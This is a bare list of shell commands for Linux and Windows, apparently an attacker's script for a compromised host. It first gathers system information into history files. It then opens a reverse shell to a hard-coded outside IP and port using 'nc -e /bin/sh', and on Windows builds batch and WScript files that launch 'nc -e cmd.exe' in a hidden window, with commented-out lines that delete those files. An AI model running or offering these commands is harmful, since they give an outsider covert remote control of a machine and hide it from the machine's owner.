//Linux : $ / Windows : #

$echo >> /tmp/cmd_history.txt
#echo. >> c:\cmd_history.txt

$date >> /tmp/cmd_history.txt
#date /t >> c:\cmd_history.txt
#time /t >> c:\cmd_history.txt

$uname -r >> /tmp/cmd_history.txt
#ver >> c:\cmd_history.txt

$pwd >> /tmp/cmd_history.txt
#cd >> c:\cmd_history.txt

$ls -al >> /tmp/cmd_history.txt
#dir >> c:\cmd_history.txt

//$tree >> /tmp/cmd_history.txt
//#tree >> c:\cmd_history.txt

$mkdir /tmp/test >> /tmp/cmd_history.txt
#mkdir c:\test2 >> c:\cmd_history.txt

$nc 43.200.152.72 59210 -e /bin/sh

#echo nc -e cmd.exe 43.200.152.72 59210 >> c:\execNC.bat
#echo Set WshShell = CreateObject("WScript.Shell") >> c:\hideCMD.bat
#echo WshShell.Exec chr(34) & "c:\execNC.bat" & Chr(34), 0 >> c:\hideCMD.bat
#echo Set WshShell = Nothing >> c:\hideCMD.bat
#c:\hideCMD.bat
//#del c:\hideCMD.bat
//#del c:\execNC.bat

$echo >> /tmp/cmd_history.txt
#echo. >> c:\cmd_history.txt